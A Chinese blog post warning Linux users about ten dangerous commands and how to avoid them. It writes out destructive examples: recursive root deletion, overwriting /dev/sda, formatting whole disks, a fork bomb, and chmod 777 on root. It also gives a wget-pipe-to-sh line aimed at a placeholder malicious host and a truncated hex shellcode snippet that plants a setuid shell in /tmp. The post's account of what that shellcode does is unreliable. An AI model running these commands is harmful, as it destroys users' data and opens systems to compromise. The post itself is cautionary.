Featured image of post linux上的危险命令 - 慎用为妙

linux上的危险命令 - 慎用为妙

了解和避免Linux操作系统中的危险命令,以保护系统完整性和防止数据丢失。

阅读时长: 7 分钟
共 3292字
作者: eimoon.com

Linux 操作系统提供了强大的命令行工具,可以执行复杂的任务并高效地管理系统。但是,如果使用不当或错误,其中一些命令可能会对系统造成很大的破坏。了解和避免这些危险的命令对于保护系统的完整性和防止数据丢失非常重要。通过了解这些命令并提高对潜在风险的认识,我们可以防止它们的意外执行,并确保我们的 Linux 系统的安全性和稳定性。

警告:使用这些命令可能非常危险,强烈建议不要使用。我们强烈建议不要尝试。要查看它们的用法,请在虚拟化软件中创建一个虚拟环境,并在该环境中运行它们,而不是在本地系统上运行。这对于防止意外损坏您的系统和保证数据安全至关重要。请记住,提高对这些命令的认识和了解是避免无意执行的关键。

1. rm -rf /* 命令

这可能是各种社交媒体中最臭名昭著的命令。你经常会发现在各种讨论中对此发表评论。该命令rm用于删除文件/目录。标志-r 和-f用于表示递归删除指定目录内的所有文件。现在,如果没有 root 权限,此命令不会造成任何危害。运行命令 sudo rm -rf /也不会产生任何问题,因为大多数发行版都提供了故障安全选项。您需要指定 –no-preserve-root 才能实际运行它。

sudo rm -rf / --no-preserve-root

但是,更简单的版本可能是:

sudo rm -rf /*

它将开始递归删除根目录中的所有文件,并且在某个特定时间,您的系统会冻结并显示一条消息“删除文件错误”。重新启动后,您将被发送到grub-rescue提示符,因此请避免运行 rm -rf / 命令。

2. 覆盖 > /dev/sda

如果您熟悉文件系统,您可能知道 /dev/sda 是什么。它(通常)是您的磁盘驱动器分区。该>操作符用于将其前一个命令的输出写入提供的指定位置。 运行任何命令并将其写入 /dev/sda 后,echo:

echo "Hello" > /dev/sda

这将用字符串“Hello”替换包含启动系统所需的所有数据的分区。这将导致 /dev/sda 块中的文件系统数据被该命令的输出所替换并导致您的系统崩溃和损坏,并且将无法恢复。以下命令是运行 /dev/sda 命令的示例,该命令将覆盖您的分区并产生不可逆转的后果。请考虑以下示例:

find / -iname "*.php" > /dev/sda1/  log.txt

执行上述命令时,由于在末尾的/和log.txt之间添加了额外的空格,因此命令的输出没有保存在文件/dev/sda1/log.txt中,而是存储在/dev/sda1块中。由于这个错误,sda1 驱动器的信息被删除,其内容被其他信息替换。

3. 将所有东西移到null中

每个 Linux 系统内部都有一个空位。这个空位就是 /dev/null。无论你把什么扔进这个区域,它都会永远丢失。此外,它会在丢弃数据后报告写入过程成功,这是它具有破坏性的主要原因.

mv /home/user/* /dev/null

mv 命令用于移动或重命名文件/目录。在上述命令中,您将主目录中的所有文件移至null。虽然根系统没有被破坏,但您的所有个人数据都将丢失。

4. 格式化硬盘

如果您不了解执行该mkfs命令的目的,它可能会成为一个危险的命令,删除分区上存储的所有数据。执行 mkfs 命令以在指定设备上创建新的文件系统。在 mkfs 之后输入的任何内容都将被格式化并替换为空的 Linux 文件系统。

虽然格式化磁盘分区有好处,但如果格式化整个硬盘(例如/dev/sda ),则所有数据都将被删除,系统无法恢复。该mkfs.ext3 /dev/sda命令将在格式化整个硬盘后创建 ext3 系统文件,该命令完成了它的工作,但最终您将得到一个无法恢复的混乱系统。这将导致您的系统无法启动,并且您将遇到“ no bootable medium found? system halted ”输出。因此,为避免有害结果,您应避免使用以下命令:

# mkfs.ext3 /dev/sda
# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

5. 叉子炸弹

这种看起来很可爱、随机的特殊字符和符号组合足以耗尽系统资源并冻结正在运行的系统。

:(){:|:&};:

参见上面的命令。这个奇怪的脚本是一个递归命令,执行后会消耗系统的 RAM 和 CPU。此命令在后台和前台不断重复。持续执行此操作会导致系统冻结,因为它会消耗所有资源,从而破坏系统。

fork bomb 命令又称为 rabbit 或 wabbit 病毒,其作用类似于 DOS 攻击。此命令的工作方式是,fork bomb 命令首先创建一个名为“ : ”的函数,然后通过创建函数的内容并将输出发送到其自身的另一个函数来执行它,然后当该函数在前台运行时,它也在后台执行,通过重复此操作来消耗系统资源并破坏系统。如果您不想让系统冻结,请避免运行此命令。 限制本地用户运行的进程数是防御Rabbit病毒攻击的另一种解决方案。例如,限制本地用户执行的进程数为6000个,可以输入以下命令

ulimit -S -u 6000

最后,唯一能拯救你的 Linux 系统的方法就是重启硬件。所以千万不要运行 Fork Bomb 命令。

6.在命令中使用“>”运算符

通常,在写入特定文件时,命令中使用“ > ”运算符,因此在使用“ > ”运算符时应小心谨慎。因为在使用“ > ”运算符写入文件时,它可以删除文件中的数据,并用新数据替换文件的内容。执行时应小心谨慎的命令的主要语法如下:

command > config_filename

因此,如果您覆盖了重要的配置文件并使用此命令向配置文件写入数据,则系统可能会崩溃。因此,请谨慎执行“ > ”运算符。

7.history | sh 命令

另一个您应该避免使用的命令是history | sh命令。history | sh 命令是一个内部 shell 工具,它提供以前执行的命令的报告,并允许用户从显示的列表中重新执行命令,而无需键入它们。此命令会无意中重新执行您已在终端环境中执行的命令,从而破坏系统。

8. 向所有人公开你的系统

在 Linux 中一切皆文件,每个文件都有一定的权限。 您可以使用 查看权限ls -l。没有权限的其他用户无法访问根文件系统。虽然这可以确保系统的私密性和安全性,但您可以使用一个命令颠覆此系统。

chmod -R 777 /

上述命令将根分区上的所有文件公开给所有人。这意味着使用系统的每个人都具有读取、写入和执行权限。这对您的系统不利。

9. 下载并运行恶意内容

如何在 Linux 中安装软件?您可以使用官方软件包管理器或现成的软件包,如 Deb/RPM、Snap。Flatpak 等。但有些软件并没有打包,其开发者提供了shell脚本供下载和运行,例如homebrew。

您下载了一个 shell 文件并以 root 身份运行它,以便在系统中安装软件。您发现其中的问题了吗?虽然它可以像 Homebrew 等官方软件一起使用,但在直接运行它之前,你应该仔细检查你下载的 shell 脚本的内容,如下所示:

wget http://malicious_source -O- | sh

这样的命令会在你的系统中下载并运行恶意脚本,从而破坏系统的安全性。

10.隐藏命令

隐藏命令是终端执行命令的方法之一,这些命令未公开,但可以在路由器上执行,并且也基于 rm-rf 命令进行编码。这些命令是出于特殊目的执行的,通过以十六进制形式隐藏命令代码,导致用户被欺骗,因为您可能无法通过隐藏代码来识别威胁,最终将面临不利的结果。例如,考虑以下命令:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
=\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755

此命令将导致危险后果,例如擦除系统的根分区。因此,不建议运行隐藏命令,因为您运行和接收的代码的识别和透明度使您免于陷入威胁和危险的陷阱。另外,不要从任何未知来源复制和执行命令,在执行命令之前确保来源有效。

总结:

危险的 Linux 命令并没有固定的列表。这个列表还可以添加很多东西,而且没有尽头。因为最终还是由用户(您)来确保不会通过盲目运行任何危险的命令来破坏系统。 “UNIX 的职责并不是阻止你射自己的脚。如果你选择这么做,那么 UNIX 的职责就是用它所知道的最有效的方式把子弹送到你的脚边”。这句话同样适用于 Linux。你可以完全控制你的操作系统。你选择用它做什么完全由你决定。

我希望这能给你一些提示,告诉你为了保证 Linux 的安全你不应该做什么。如果你有什么建议,请在评论部分告诉我。

使用 Hugo 构建
主题 StackJimmy 设计